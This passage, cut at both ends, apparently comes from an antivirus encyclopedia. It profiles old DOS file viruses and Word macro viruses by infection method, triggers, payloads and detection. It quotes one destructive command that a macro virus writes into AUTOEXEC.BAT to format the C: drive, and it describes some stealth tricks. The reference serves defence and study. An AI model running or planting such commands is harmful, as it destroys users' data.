memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: If the current calendar day is Monday and current time is 18:00 later, the virus halts the system after displaying the following message: "Hard day's night !" Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 662 bytes. [In83-584] Virus Name: In83-584 Virus Type: File Virus (COM files) Virus Length: 584 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 584 bytes. [Tankard] Virus Name: Tankard Virus Type: File Virus (COM files) Virus Length: 493 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 493 bytes. [1241] Virus Name: 1241 Virus Type: File Virus (COM and EXE files) Virus Length: 1560-1570 bytes PC Vectors Hooked: INT 21h Execution Procedure: The virus checks whether the current calendar date is later than November 13, 1990. If it is, the virus displays the following message: "St Cruz, Dili, 1991 Nov 12. Lusitania Expresso, Freedom for East Timor !" Then reboots the system. Otherwise, it will check whether it is memory resident. If not, it loads itself resident in the high memory. Then hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1560-1570 bytes. [104] Virus Name: 104 Virus Type: File Virus (COM files) Virus Length: 400 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 400 bytes. [Trident] Virus Name: Trident Virus Type: File Virus (COM and EXE files) Virus Length: 2385-2395 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. 2) Checks whether the DIR command is used (e.g., DIR H*.*). If so, all uninfected COM and EXE files accessed by this command get infected. Damage: None Detection method: Infected files increase by 2385-2395 bytes. [Explode] Virus Name: Explode Virus Type: File Virus (COM files) Virus Length: Execution Procedure: 1) Searches for all uninfected COM files on the current directory, then proceeds to infect them. 2) Checks whether the current month is April or May. If it is, the virus displays the following message: "Your hard drive is about to explode !" The virus then destroys all data on the hard disk. If the calendar shows months other than April and May, the virus displays: "Program too big to fit in memory." Damage: 1) It sometimes destroys all data on the hard disk. 2) It overwrites the original files with the virus code, thus corrupting the files. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [End-Of] Virus Name: End-Of Virus Type: File Virus (COM files) Virus Length: 783 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=3Bh) to infect files. When accessing other directories, all uninfected COM files on the original directory will be infected. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 783 bytes. [Copyr-Ug] Virus Name: Copyr-Ug Virus Type: File Virus (COM and EXE files) Virus Length: 766 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 766 bytes. [Chuang] Virus Name: Chuang Virus Type: File Virus (COM and EXE files) Virus Length: 970 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). 2) Checks whether the current calendar day is later than 12, and current time is 22:00 or later. If these conditions are met, the virus destroys all data on the hard disk. Damage: The virus sometimes destroys all data on the hard disk. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 970 bytes. [Ancient] Virus Name: Ancient Virus Type: File Virus (COM files) Virus Length: 783 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). 2) Cleans the screen or displays various colors of ' * ' until a key is depressed. At that time, a strange sound will emit for approximately 5 minutes. After which, the virus will return to the original program. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) Reinfects files. Detection method: Infected files increase by 783 bytes. [Adolf_Hitler] Virus Name: Adolf_Hitler Virus Type: File Virus (COM files) Virus Length: 475 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 475 bytes. [Fob] Virus Name: Fob Virus Type: File Virus (COM files) Virus Length: 1750-1950 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). There is a 50% chance that the virus will display a message asking the user to input the following word: "SLOVAKIA." The virus will wait until the user inputs this word and will proceed to terminate the program. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files will ask user to input the word "SLOVAKIA," and will not end until the user has done so. [Signs] Virus Name: Signs Virus Type: File Virus (COM files) Virus Length: 720 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. 3) Checks whether the current calendar day is Friday. If it is, the screen will roll up once a minute. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 720 bytes. [Shield] Virus Name: Shield Virus Type: File Virus (COM files) Virus Length: 172 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: 1) An error message appears when writing because INT 24h has not been hanged. 2) The function of the infected program is different from the original. Infected files have no ability to infect other files. But they can display a message when the current month is February. The message reads: "I greet you user . I am COM-CHILD, son of The Breeder Virus. Look out for the RENAME-PROBLEM !" Detection method: Infected files increase by 172 bytes. [Wishes] Virus Name: Wishes Virus Type: File Virus (COM and EXE files) Virus Length: 970 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. 3) Checks whether the current calendar day is 13, Friday. If it is, the virus proceeds to destroy all data on the hard disk. Infection Procedure: 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: The virus sometimes destroys all data on the hard disk. Detection method: Infected files increase by 970 bytes. [439] Virus Name: 439 Virus Type: File Virus (COM files) Virus Length: 439 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 439 bytes. [4-A] Virus Name: 4-A Virus Type: File Virus (COM files) Virus Length: 450-460 bytes Execution Procedure: The virus displays the following message: "-----Hello , I am virus ! -----". The virus then searches for an uninfected COM file on the current directory and infects it (It only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: 1) Infected files display above message when executed. 2) Infected files increase by 450-460 bytes. [330] Virus Name: 330 Virus Type: File Virus (COM files) Virus Length: 330 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory and infects it (It only infects one file at a time). 2) Checks whether the current month is July. If it is, the virus displays the following message: "[330] by ICE-9." Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 330 bytes. [203] Virus Name: 203 Virus Type: File Virus (COM files) Virus Length: 203 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 203 bytes. [Mr-Vir] Virus Name: Mr-Vir Virus Type: File Virus (COM files) Virus Length: 508 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 508 bytes. [Nazgul] Virus Name: Nazgul Virus Type: File Virus (COM files) Virus Length: 266 bytes Execution Procedure: Virus searches for all uninfected COM files on the current directory, then infects them. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 266 bytes. [Napc] Virus Name: Napc Virus Type: File Virus (COM and EXE files) Virus Length: 729 bytes Execution Procedure: Virus searches for all uninfected COM and EXE files on the current directory, then proceeds to infect them. Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 729 bytes. [Little] Virus Name: Little Virus Type: File Virus (COM files) Virus Length: 665 bytes Execution Procedure: Virus searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 665 bytes. [Atte-629] Virus Name: Atte-629 Virus Type: File Virus (COM files) Virus Length: 629 bytes Execution Procedure: Virus searches for an uninfected COM file on the current directory, then infects it (It only infects one file at a time). Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 629 bytes. [A&A] Virus Name: A&A Virus Type: File Virus (COM files) Virus Length: 506 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 506 bytes. [Magnitogorski-3] Virus Name: Magnitogorski-3 Virus Type: File Virus (COM and EXE files) Virus Length: 3000 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 3000 bytes. [Lpt-Off] Virus Name: Lpt-Off Virus Type: File Virus (COM files) Virus Length: 256 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 256 bytes. [Kiwi-550] Virus Name: Kiwi-550 Virus Type: File Virus (EXE files) Virus Length: 550-570 bytes PC vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 550-570 bytes. [Dennis-2] Virus Name: Dennis-2 Virus Type: File Virus (COM and EXE files) Virus Length: 897 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 897 bytes. [Beer] Virus Name: Beer Virus Type: File Virus Virus Length: PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected file, the virus proceeds to infect it. Damage: None Note: This virus has at least three variations. [2560] Virus Name: 2560 Virus Type: File Virus (COM and EXE files) Virus Length: 2560 bytes PC vectors hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 2560 bytes. [Atas-3321] Virus Name: Atas-3321 Virus Type: File Virus (COM files) Virus Length: 3321 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. The virus can only execute its program on DOS 3.3. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 3321 bytes. [Ecu] Virus Name: Ecu Virus Type: File Virus (EXE files) Virus Length: 711 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. The virus can only execute its program on DOS 3.3. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: Most infected files cannot execute. Detection method: Infected files increase by 711 bytes. [N1] Virus Name: N1 Virus Type: File Virus (COM files) Virus Length: 10,230-10,240 bytes Execution Procedure: The virus searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). The virus then displays the following message: "This File Has Been Infected By NUMBER One!" Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files will display the above message when executed. [Arcv-718] Virus Name: Arcv-718 Virus Type: File Virus (COM and EXE files) Virus Length: 718 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. 3) Checks whether the current date is between 1 and 7, January. If it is, the virus displays the following message and proceeds to hang the system: "Hello Dr Sol & Fido Lurve U lots... " Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: Virus will sometimes halt the system. Detection method: Infected files increase by 718 bytes. [L-933] Virus Name: L-933 Virus Type: File Virus (COM files) Virus Length: 933-950 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). 2) Checks the current date. i) If it is March 8, the virus destroys all data on the hard disk. ii) If it is September 1, the virus deletes itself. Damage: Virus will sometimes destroy all data on the hard disk. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 933-950 bytes. [Alpha743] Virus Name: Alpha743 Virus Type: File Virus (COM files) Virus Length: 743 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory, then infects it (only infects one file at a time). 2) Checks whether the current year is 1993 or later. If current month is later than February, and current day is 5, the virus displays the following message: "Your PC has ALPHA virus. Brought to you by the ARCV Made in ENGLAND" Damage: None Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 743 bytes. [Clint] Virus Name: Clint Virus Type: File Virus (COM and EXE files) Virus Length: Execution Procedure: 1) Searches for an uninfected COM or EXE file on the current directory, then infects it (infects four files at a time). 2) Displays the following message: "memory allocation error !" Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) It does not stay resident in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files display the above message when executed. [Love-Child-2710] Virus Name: Love-Child-2710 Virus Type: File Virus (COM files) Virus Length: 2710 bytes PC Vectors Hooked: INT 13h, INT 24h Execution Procedure: 1) Checks whether the current date is one of the following dates: November 5, February 22, June 23, August 24, or October 6, or that the system is not DOS 3.3. If these conditions are met, the virus destroys the Partition and parts of FAT. If conditions are not met, the virus checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 13h and goes back to original routine. Infection Procedure: 1) Hooks INT 13H to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: Virus sometimes destroys the Partition and parts of FAT. Detection method: Infected files increase by 2710 bytes. [Basedrop] Virus Name: Basedrop Virus Type: File Virus (EXE files) Virus Length: Execution Procedure: 1) There is a 25% chance that the virus will do the following: Search for an uninfected EXE file on the current directory, then infect it (only infects one file at a time). 2) There is a 25% chance that the virus will do the following: Carry-out the above procedure. Then, display a message asking the user to input the following word: "SLOVAKIA." The virus will wait until the user inputs this word. Virus will then terminate. 3) There is a 50% chance that the virus program will not infect files. Damage: None [Arianna] Virus Name: ARIANNA Virus Type: Multi-partite virus 1. High memory resident file infector. The ARIANNA virus will only infect .EXE files which are shorter than 70000H bytes in length and bigger than 1770H bytes in length. 2. Partition sector infector. This virus overwrites the last 9 sectors of the hard drive. Virus Length: 3426 bytes (EXE files), 3586 (memory) PC Vectors Hooked: INT 21h Infection Process: This virus is spread by executing an infected program or a computer with a partition that has been infected. When a file infected with the ARIANNA virus is executed, it will check to see if it is already resident in the memory by checking to see if the return value of ax is equal to 0 after int 2f(ax=FE01). If the virus is already in the memory it will execute the infected program. The virus code remains resident in the high memory. Damage: Decreases available memory. Infected files increase by 3426 bytes. Symptoms: While the ARIANNA virus is resident in memory you cannot alter the HD partition to cause any damage to the partition sector by cleaning it. The way to clean the ARIANNA virus from the system is to boot up the computer with a clean system diskette and overwrite the infected partition sector with the No.9. [Boza] Virus Name: Boza Alias Name: Bizatch Virus Type: File Virus (EXE files) Virus Length: 2,680 bytes Execution Procedure: When an infected file is executed, the virus does not install itself into memory. The virus will infect files which are in Microsoft's Win32 Portable Executable (PE) file format which means that the virus will only infect Win95 and Win32S executable files. The virus attempts to infect up to three files in the current directory; however, due to some bugs in the program it may end up corrupting the files it infects. When the system date reaches the 31st of any month the virus will display the following message: "The taste of fame just got tastier! VLAD Australia does it again with the world's first Win95 Virus. From the old school to the new. Metabolis Qark Darkman Automag Antigen RhinceWind Quantum Absolute Overload CoKe" The virus also contains the following text string: "Please note: the name of this virus is [Bizatch] written by Quantum of VLAD" [WORD_Demonstrate] Virus Name: WORD_Demonstrate (Demonstration Macro Virus) Virus Type: Word macro virus Virus Length: N/A Description: This virus infects MS Word documents. This virus consists of the following macro: AutoClose When an infected file is opened, the virus infects the global template "Normal.dot" by inserting a single macro. Once the virus is active, it will infect all new documents when they are closed. [Winexcel_DMV] Virus Name: Winexcel_DMV (Demonstration Macro Virus) Virus Type: Excel macro virus Virus Length: N/A Description: This virus infects MS Excel documents. This virus consists of the following macros: AutoClose When an infected file is closed, the virus adds a single macro to the global macro file. Subsequent files which are closed also have the macro attached. This virus does not work because of a bug in the program. [WORD_Xenixos] Virus Name: WORD_Xenixos Alias Name: Nemesis, Xos, Evil One, Xenixos:De Virus Type: Word macro virus Virus Length: 31342 Bytes (11 Macros) Infection: German Microsoft Word documents and templates Symptoms:Text added to printed documents Format of C:\ drive Change of C:\AUTOEXEC.BAT Display of windows Description: This virus infects MS Word documents. Xenixos is the first macro virus that was written especially for the German version of Microsoft Word. All macro names are in German, and therefore it only works with the German Word version. The virus was found in Austria, and is also posted in Usenet. The following macros can be found in infected documents and viewed with the Datei|Dokumentvorlage|Organisieren|Makros command. "AutoExec" "AutoOpen" "DateiBeenden" "DateiDrucken" "DateiDruckenStandard" "DateiOeffnen" "DateiSpeichern" "DateiSpeichernUnter" "Drop" "Dummy" "ExtrasMakro" The infected global template (NORMAL.DOT) includes the following additional macros: "AutoClose" "AutoExit" "AutoNew" They all contain the empty macro "Dummy". Upon opening of an infected document, Xenixos infects the global template unless the "DateiSpeichernUnter" macro is already present. Xenixos spreads upon using the "DateiSpeichern" ("FileSave") and "DateiSpeichernUnter" ("FileSaveAs") command. All its macros are Execute-Only, and therefore they can not be viewed or modified. Files with the name "VIRUS.DOT" will not become infected. During infection, Xenixos checks the system date and then activates various destructive payloads according to the date. During the month of May it adds the following text to "C:\AUTOEXEC.BAT": " @echo j format c: /u > nul " This will format the C:\ drive if the DOS "format" command is present. During the month of March, Xenixos tries to activate the DOS-Virus "Neuroquila" by using a DOS DEBUG script. This part of the virus is faulty (it tries to create an .EXE file) and therefore the DOS-based virus never infects the system. The third destructive payload checks the system time, and in case of a value bigger than 45 in the seconds field, it will add the password "XENIXOS" to a saved document. Upon printing a document, Xenixos checks the system time again, and in case of a value smaller than 30 in the seconds field, it will add the following text to the end of the printed document: " Nemesis Corp. " Xenixos also includes some additional tricks to make its detection more difficult. It turns off the prompting of Word before saving a modified global template and replaces the Tools|Macros command with a code that will display the following error message instead of the activation of Word's built-in macro viewer/editor: " Diese Option ist derzeit leider nicht verfuegbar " (This prevents the user from seeing the virus macros). Upon starting MS Word, Xenixos copies parts of its virus macros and saves them with new names, (for example: "DateiSpeichern" -> "DateiSpeichernBak"). After a document is opened, Xenixos restores its backups. The following text is also found in the virus code, yet is never displayed: " Brought to you by the Nemesis Corporation (c) 1996 " In addition, Xenixos changes section "Compatibility" inside the WIN.INI file. It sets the variable "RR2CD" to the value "0x0020401", and the variable "Diag$" to "0". The WIN.INI variables can be used to deactivate the virus. Setting the variable "Diag$" to "1" will prevent most of the destructive payloads. Some replicants of Xenixos will also display the following Wordbasic error message: " Falscher Parameter " [WORD_Wieder] Virus name: WORD_Wieder (a.k.a. Pferd, Wieder÷ffnen) Number of macros: 2 Encrypted: No Macro names: AutoOpen, AutoClose Size of macros: 638 Bytes Place of origin: Germany Date of origin: Spring 1996 Destructive: Yes Common In-The-Wild: No Description: Wieder is a not a virus but a trojan horse. It does not infect other files. When an infected document is opened, Wieder creates the directory "C:\TROJA", and moves the system file "C:\AUTOEXEC.BAT" into the newly created directory. After moving the file the original files are deleted. When closing an infected document, the following text is displayed: " Auf Wieder÷ffnen " " P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei " " gerne wiederhaben moechten, sollten Sie einen " " Blick in das neue Verzeichnis C:\TROJA werfen... " The original document, which included the trojan, has the following text: " Trojanisches Pferd " " Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT- " " Datei aus dem Hauptverzeichnis C:\ entfernt. Hoffentlich haben " " Sie eine Kopie davon ? " " Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen " " und mit ein klein wenig mehr Aufwand koennte man auch einen " " Virus installieren. " [WORD_Wazzu] Virus name: WORD_Wazzu Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Washington, USA Date of origin: Posted to Usenet in April 1996 Destructive: Yes Common In-The-Wild: Yes Description: When an infected document is opened, Wazzu.A checks the name of the active document. If it is "normal.dot", then the virus macro is copied from the global template to the open document. Otherwise normal.dot becomes infected. Wazzu does not check if a document is already infected. It simply overwrites the "autoopen" macro. Wazzu has a destructive payload. It picks a random number between 0 and 1 and if the number smaller than 0.2 (probability of 20 percent), the virus will move a word from one place in the document to another. This is repeated three times. So the probability for a Word to be moved is 48.8 percent. After the third time, Wazzu picks a final random number (between 0 and 1) and if the value is higher than 0.25 (probability of 25 percent), the word "Wazzu" will be inserted into the document. After an infected documents is cleaned, it has to be checked really careful because chances of having a modified document (words swapped or added) are over 61 percent. This can be a very time consuming job with large documents. Wazzu is a nickname for the Washington State University. [WORD_Reflex] Virus Name: WORD_Reflex Alias Name: RedDwarf Virus Type: Word macro virus Virus Length: 897 Bytes in .doc files and 1226 Bytes in .dot files (3 or 4 Macros) Symptoms: Display of Windows Place of origin: Ireland Description: This virus infects MS Word documents. Delete virus macros from infected documents (AutoOpen, FClose, FileClose, FA) Reflex contains 3 encrypted macros (Execute-Only) with a size of 897 Bytes. "AutoOpen" "FClose" "FileCLose" An infected global template contains one more macro ("FA"). Upon infection, Reflex turns off the prompting of Word to ensure a hidden infection of the global template (NORMAL.DOT). Infected documents are saved with the password "Guardian." They are also converted internally to templates, which is very common for macro viruses. Reflex was written at an antivirus conference after an Anti-Virus company announced a challenge to hackers to break its new technology. Any author of a new undetected macro virus was supposed to receive champagne as a reward. When Reflex infects a file it displays the following window: "Now, Where's that Jerbil of Bubbly? " Some replicants of Reflex will also display the following Wordbasic error message: "Document not open" [WORD_Polite] Virus name: WORD_Polite (a.k.a. WW2Demo) Number of macros: 2 Encrypted: No Macro names: FileClose, FileSaveAs Size of macros: 1918 Bytes Place of origin: USA Date of origin: March, 1996 Destructive: No Common In-The-Wild: No Description: Polite was first created with Microsoft version 2.0, yet also works with higher versions of Microsoft Word. Polite can be called a demonstration virus and is very unlikely to spread. Before each attempted infection, it displays a window with the following question: " Shall I infect the file ? " If the user answers with the "No" button, no document becomes infected. While it asks for permission to infect files, it does not ask for permission to infect the global template (NORMAL.DOT). Upon infection of the global template (when an infected document is closed), Polite displays the following message: " I am alive! " Once Polite infects a Word 6.0/7.0 document it can not infect Word 2.0 documents anymore. [WORD_Pheeew] Virus Name: WORD_Pheeew Alias Name: Dutch, NietGoed, Pheeew:NL Virus Type: Word macro virus Virus Length: 2759 Bytes (4 Macros) Symptoms: Displays text, deletes files in C:\ and C:\DOS Place of origin: Unknown Description: This virus infects MS Word documents. Pheeew is the first macro virus written for the Dutch version of Word. This virus is strongly based on the Concept macro virus, and has four unencrypted macros: "AutoOpen" "IkWordNietGoed1" "IkWordNietGoed2" "Lading" Pheeew checks for previous infection of the global template (NORMAL.DOT) when an infected document is opened. The virus does this by checking for two macros, namely "Lading" and "BestandOpslaanAls." If the template is not infected, Pheeew copies its viral macros into the global template. The macro "IkWordNietGoed2" is saved under the name "BestandOpslaanAls" (FileSaveAs). When the "FileSaveAs" command is used documents become infected. These documents are also saved as templates (a common behavior for macro viruses). After infecting, Pheeew displays various windows with the following message: Window "Important": " Gotcha ! " Window "FINAL WARNING!": "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC" Clicking "No" at the last window causes Pheeew to activate its dangerous payload--all files in C:\ and C:\DOS are deleted (certain file attributes are bypassed). Pheeew also contains the following texts: "Done by the Catman " Macro "Lading": " Sub MAIN " " REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " " REM *** WARNING *** " " REM You're computer could be killed right now! " " REM Thank to you and me it's still ok! " " REM Next time will be worse! " " REM *** PHEEEW! *** " " REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " " End Sub " [WORD_PCW] Virus Name: WORD_PCW Alias Name: Birthday, B-Day, Suzanne Virus Type: Word macro virus Virus Length: 1039 Bytes (2 Macros) Symptoms: Display of message Place of origin: German computer magazine Description: This virus infects MS Word documents. PCW contains two encrypted (Execute-Only) macros with a size of 1039 Bytes. "AutoOpen" "DateiSpeichernUnter" The name was selected because its code was published in the German magazine "PC Welt". We expect to see other variants of this virus, since the code was available to the public. Upon opening an infected document, PCW will infect the global template (NORMAL.DOT). Further documents are infected when the "DateiSpeichernUnter" command is used. Infected documents are internally converted into templates, which is very common for macro viruses. PCW is also known under the name "Birthday", since it displays the following window: " Happy Birthday! Herzlichen Glⁿckwunsch... " PCW uses German macro names and will therefore only work with the German version of Microsoft Word. [WORD_Nuclear] Virus name: WORD_Nuclear (a.k.a. Alert) Number of macros: 9 Encrypted: Yes Macro names: AutoExec, AutoOpen, DropSuriv, FileExit, FilePrint, FilePrintDefault, FileSaveAs, InsertPayload, Payload Size of macros: 10556 Bytes Place of origin: Australia Date of origin: September, 1995 Destructive: Yes Common In-The-Wild: Yes Description: Nuclear was the second macro virus found "In-the-Wild" (after Concept). It was distributed, over the Internet in a document with information about the Concept virus. It was also the first macro virus that uses Execute-Only (encrypted) macros to make analysis more difficult. Nuclear is 